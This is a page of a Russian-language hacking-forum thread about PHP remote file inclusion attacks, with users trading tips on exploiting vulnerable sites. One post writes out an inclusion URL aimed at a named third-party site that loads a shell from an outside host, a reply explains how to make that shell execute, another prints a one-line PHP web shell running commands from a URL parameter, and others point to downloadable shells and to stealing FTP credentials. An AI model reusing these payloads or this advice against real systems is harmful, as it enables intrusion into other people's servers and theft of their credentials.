Авторские статьи php injection

Discussion in 'Статьи' started by GreenBear, 24 Dec 2005.

Page 3 of 4
  1. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Фигню пишешь. Причём тут исходный код? Хоть на on line 3333333 разницы никакой.
    Да.
    Почитай про директивы в php.ini
     
    #41 Ch3ck, 10 Mar 2008
  2. De-visible

    De-visible [NDC] Network develope c0ders

    Joined:
    6 Jan 2008
    Messages:
    916
    Likes Received:
    550
    Reputations:
    66
    археолог???
    Для спасибо есть репутация.
     
    #42 De-visible, 10 Nov 2008
    1 person likes this.
  3. bombeg

    bombeg Member

    Joined:
    27 Oct 2008
    Messages:
    136
    Likes Received:
    83
    Reputations:
    8
    статья оцтой. достаточно одной регулярки - это вся статья. и еще элита форума такую ***ню пишет, фу противно.
     
    #43 bombeg, 10 Nov 2008
    3 people like this.
  4. .:EnoT:.

    .:EnoT:. Сексуальное чудовище

    Joined:
    29 May 2007
    Messages:
    803
    Likes Received:
    559
    Reputations:
    50
    угу, статья 2005 года...а ты к примеру 3 года назад умнее был?)))
     
    #44 .:EnoT:., 10 Nov 2008
    1 person likes this.
  5. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    чтобы обойти всю эту иньекцию достаточно выключить register_globals
     
    #45 Ru}{eeZ, 10 Nov 2008
    1 person likes this.
  6. bombeg

    bombeg Member

    Joined:
    27 Oct 2008
    Messages:
    136
    Likes Received:
    83
    Reputations:
    8
    чтобы не париться на счет инъекций, можно убить себя.
     
    #46 bombeg, 10 Nov 2008
    1 person likes this.
  7. Ru}{eeZ

    Ru}{eeZ Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    454
    Likes Received:
    73
    Reputations:
    -5
    а чтобы инклудиться на другие сайты, параметр include_path должен быть включён (php.ini), а он отключён по стандарту, как и register_globals

    `````````````````
    Статья старая, но раньше она была актуальна, bombeg, не надо поднимать переполох
     
    #47 Ru}{eeZ, 10 Nov 2008
    Last edited: 10 Nov 2008
  8. winterfrost

    winterfrost Elder - Старейшина

    Joined:
    18 Aug 2008
    Messages:
    42
    Likes Received:
    18
    Reputations:
    15
    Насколько мне известно, файлы с расширением .php посмотреть всёравно не получиться, потому-что "The include() statement includes and evaluates the specified file. " (http://ua.php.net/include/).

    p.s. чёрт, только щас заметил, что статья 2005-го года =))))
     
    #48 winterfrost, 10 Nov 2008
    Last edited: 10 Nov 2008
  9. den1skA

    den1skA Banned

    Joined:
    20 May 2008
    Messages:
    0
    Likes Received:
    25
    Reputations:
    0
    Блин ещё бы кто написал статейку про sql injection вообще шикарно бы было!
     
    #49 den1skA, 11 Nov 2008
  10. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    #50 Solide Snake, 12 Nov 2008
  11. den1skA

    den1skA Banned

    Joined:
    20 May 2008
    Messages:
    0
    Likes Received:
    25
    Reputations:
    0
    #51 den1skA, 12 Nov 2008
  12. S[N]EP

    S[N]EP Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    102
    Likes Received:
    28
    Reputations:
    10
    А что делать если стоит фильтрация на \ : . - вообщем на "плохие" символы?
     
    #52 S[N]EP, 20 Feb 2009
    1 person likes this.
  13. N@b$ter

    N@b$ter Elder - Старейшина

    Joined:
    6 Oct 2009
    Messages:
    293
    Likes Received:
    73
    Reputations:
    21
    Plizzz help

    Такая фигня, http://www.prodisney.ru/index.php?page=http://nabstre.tu2.ru/shell.php но показывает дерикторию моего сайта а не этого что делать???
     
    #53 N@b$ter, 13 Oct 2009
  14. Rezak

    Rezak New Member

    Joined:
    25 Jan 2008
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Во первых скрипт на твоем сайте должен быть не исполняемым, то есть txt файл к примеру.
    Либо вообще без расширения, то есть так:

    index.php?page=http://nabstre.tu2.ru/shell.txt?

    Потому что если файл исполняемый, то он исполнятся будет на твоем сервере, а на выходе будет уже результат. Поэтому выводится содержание директории на твоем сервере.


    Во вторых конкретно на этом сайте бага не работает, скрипт не инклюдит файлы, а выводит их содержание.
    Так что облом.
     
    #54 Rezak, 16 Oct 2009
    Last edited: 16 Oct 2009
    1 person likes this.
  15. SLITES

    SLITES New Member

    Joined:
    27 Jul 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    а такой вопросик почему часто бывает то что шел не запускается а просто отображается код шелла.
     
    #55 SLITES, 6 Nov 2009
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    потому что риадер, а не LFI, нет инклуда, есть читалка

    PS: Но тоже очень неплохо, т.к. можно прочитать важную системную информацию, например фтп-логин/пасс, что будет покруче любого шелла
     
    #56 Pashkela, 6 Nov 2009
  17. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    Бага в функциях fopen(), file(), file_get_contents() и подобных функциях, которые не способны интерпретировать код.
     
    #57 shellz[21h], 6 Nov 2009
  18. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    а можете дать адрес рабочего шелла? а то та, которая в статье - уже дохлый.
    (или код, чтоб запись на свой хост)
     
    #58 B1t.exe, 10 Nov 2009
  19. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    <?php system($_GET[cmd]); ?>

    Если нужен продвинутый шелл - топай топай в раздел "Избраное" и качай WSO
     
    #59 Ins3t, 10 Nov 2009
  20. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Спасибо, нашел и скачал.
    а не подскажете как его настроить? просто все это залить в сервер и "вызывать" по адресу: www.mysite.ru/wso2.php ?
     
    #60 B1t.exe, 11 Nov 2009
(You must log in or sign up to post here.)
Page 3 of 4
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.